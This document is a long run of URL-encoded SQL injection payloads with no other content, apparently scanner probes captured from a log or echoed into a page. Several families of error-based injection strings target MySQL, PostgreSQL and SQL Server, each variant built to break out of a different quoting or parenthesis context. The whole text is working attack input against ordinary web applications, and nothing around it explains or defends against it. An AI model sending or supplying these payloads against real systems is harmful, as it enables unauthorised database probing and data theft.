-9596%22%29%29%29%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%28%28%28%22Tdhf%22%20LIKE%20%22Tdhf -9902%22%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29%20AND%20%22jKzN%22%20LIKE%20%22jKzN -8183%29%20WHERE%209892%3D9892%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29 -5079%27%29%20WHERE%203867%3D3867%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29 -3062%27%20WHERE%206846%3D6846%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29 -8181%22%20WHERE%208070%3D8070%20OR%20ROW%285855%2C5231%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%285855%3D5855%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%205855%20UNION%20SELECT%205231%29a%20GROUP%20BY%20x%20LIMIT%201%29 -9743%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -5593%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -7238%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -1400%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2348%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%285762%3D5762 -3681%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%284239%3D4239 -8648%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%282152%3D2152 -1055%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -3325%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%27iTNe%27%3D%27iTNe -5248%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%27uxXm%27%3D%27uxXm -4649%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%27YZXH%27%3D%27YZXH -8816%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%27mXXm%27%3D%27mXXm -4026%27%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%27ORhP%27%20LIKE%20%27ORhP -5726%27%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%27jrQn%27%20LIKE%20%27jrQn -1631%27%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%27iVat%27%20LIKE%20%27iVat -7816%27%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%27ulcI%27%20LIKE%20%27ulcI -1107%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%22XkSb%22%3D%22XkSb -2050%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%22YPUT%22%3D%22YPUT -6796%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%22DnpM%22%3D%22DnpM -2703%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%22xAba%22%3D%22xAba -6981%22%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%22ytzR%22%20LIKE%20%22ytzR -7673%22%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%22bwiz%22%20LIKE%20%22bwiz -7837%22%29%29%29%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%28%28%28%22Hyqf%22%20LIKE%20%22Hyqf -7907%22%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23%20AND%20%22Wkkm%22%20LIKE%20%22Wkkm -9053%29%20WHERE%206840%3D6840%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8355%27%29%20WHERE%207488%3D7488%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8436%27%20WHERE%201092%3D1092%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -2879%22%20WHERE%206742%3D6742%20OR%201%20GROUP%20BY%20CONCAT%280x3a7676693a%2C%28SELECT%20%28CASE%20WHEN%20%284986%3D4986%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7471773a%2CFLOOR%28RAND%280%29%2A2%29%29%20HAVING%20MIN%280%29%23 -8940%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -3216%27%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -7357%27%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -3090%22%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -4062%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%289186%3D9186 -4367%29%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%284581%3D4581 -8636%29%29%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%282244%3D2244 -4353%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -2465%27%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27WoUW%27%3D%27WoUW -5179%27%29%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27CmWm%27%3D%27CmWm -5883%27%29%29%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27pAST%27%3D%27pAST -1904%27%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27CReY%27%3D%27CReY -2590%27%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%27Ihja%27%20LIKE%20%27Ihja -2237%27%29%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%27PBQg%27%20LIKE%20%27PBQg -7287%27%29%29%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27IclW%27%20LIKE%20%27IclW -3357%27%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%27OLfu%27%20LIKE%20%27OLfu -5415%22%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22VTak%22%3D%22VTak -6090%22%29%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22Ycjt%22%3D%22Ycjt -4022%22%29%29%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22zXIq%22%3D%22zXIq -9257%22%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22SjbR%22%3D%22SjbR -1256%22%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%22jvxl%22%20LIKE%20%22jvxl -9895%22%29%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%22Yedt%22%20LIKE%20%22Yedt -1027%22%29%29%29%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22PmFv%22%20LIKE%20%22PmFv -7275%22%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20AND%20%22hrHk%22%20LIKE%20%22hrHk -9621%29%20WHERE%207766%3D7766%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -8540%27%29%20WHERE%201698%3D1698%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -6008%27%20WHERE%201006%3D1006%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -5116%22%20WHERE%208177%3D8177%20OR%203099%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283099%3D3099%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29 -5019%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -8149%27%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -9901%27%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -2270%22%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 -4681%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%283276%3D3276 -3806%29%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%288461%3D8461 -8400%29%29%29%20OR%202902%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282902%3D2902%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%286112%3D6112 